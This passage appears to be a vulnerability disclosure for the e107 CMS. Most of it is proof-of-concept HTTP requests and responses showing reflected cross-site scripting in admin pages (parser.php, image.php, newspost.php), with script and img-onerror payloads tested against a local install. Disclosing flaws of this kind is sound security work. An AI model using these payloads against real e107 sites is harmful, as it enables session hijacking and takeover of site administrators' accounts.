    Request:
    POST /e107/e107_plugins/tinymce4/plugins/e107/parser.php HTTP/1.1
    Host: 127.0.0.1
    Content-Length: 1126
    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
    Accept: text/html, */*; q=0.01
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Origin: http://127.0.0.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
    Accept-Encoding: gzip, deflate
    Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
    Connection: close
    
    content=%5Bhtml%5D%3Cp%3E%3Cstrong%3ELore"/><script>alert(1)</script>bb&mode=tohtml
    
    Response:
    HTTP/1.1 200 OK
    Date: Thu, 11 May 2023 19:38:45 GMT
    Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
    X-Powered-By: PHP/7.4.29
    Set-Cookie: PHPSESSID=c4mphnf1igb7lbibn4q1eni10h; expires=Fri, 12-May-2023 19:38:45 GMT; Max-Age=86400; path=/e107/; HttpOnly
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 1053
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    <p><strong>Lore"/><script>alert(1)</script>bb
    
    ### XSS Reflected - Authorized
    
    URL: http://127.0.0.1/e107/e107_admin/image.php
    Parameters: for
    
    # POC 1
    Request:
    GET /e107/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1 HTTP/1.1
    Host: 127.0.0.1
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    Connection: close
    
    Response:
    HTTP/1.1 200 OK
    Date: Thu, 04 May 2023 03:07:35 GMT
    Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
    X-Powered-By: e107
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    ETag: "37f107dbe6a998ecf7b71689627c2a56"
    Content-Length: 12420
    Vary: Accept-Encoding
    X-Frame-Options: SAMEORIGIN
    Connection: close
    Content-Type: text/html; charset=utf-8
    
    <!doctype html>
    <html lang="en">
    <head>
    <title>Media Manager - Admin Area :: hacked">bbbbb</title>
    <meta charset='utf-8' />
    <meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />
    
    [...]
    <div id="uploader" data-max-size="2mb" rel="/e107/e107_web/js/plupload/upload.php?for=_commonh5it1"><img src=a onerror=alert(1)>dezaw&path=">
    	        <p>No HTML5 support.</p>
    		</div>
    [...]
    
    # POC 2
    
    URL: http://127.0.0.1/e107/e107_admin/newspost.php
    Parameters: Payload in URL
    
    Request:
    GET /e107/e107_admin/newspost.php/sdd4h"><script>alert(1)</script>kzb89?mode=main&action=list HTTP/1.1
    Host: 127.0.0.1
    Cache-Control: max-age=0
    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
    Accept-Encoding: gzip, deflate
    Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
    Cookie: PHPSESSID=ftq2gnr1kgjqhfa3u902thraa8
    Connection: close
    
    Response:
    
    
    
    
    HTTP/1.1 200 OK
    Date: Fri, 05 May 2023 06:21:53 GMT
    Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
    X-Powered-By: e107
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    ETag: "d127dd6a44a22e093fed60b83bf36af2"
    Content-Length: 72914
    Vary: Accept-Encoding
    X-Frame-Options: SAMEORIGIN
    Connection: close
    Content-Type: text/html; charset=utf-8
    
    <!doctype html>
    <html lang="en">
    <head>
    <title>News - List - Admin Area :: hacked">bbbbb</title>
    <meta charset='utf-8' />
    <meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />
    
    [...]
    <a class="btn btn-default btn-secondary nextprev-item next " href="http://127.0.0.1/e107/e107_admin/newspost.php/sdd4h">
    <script>alert(1)</script>kzb89/?mode=main&action=list&from=10" title="Go to the next page" ><i class="fa fa-forward"></i></a>
    [...]

Tag

#webkit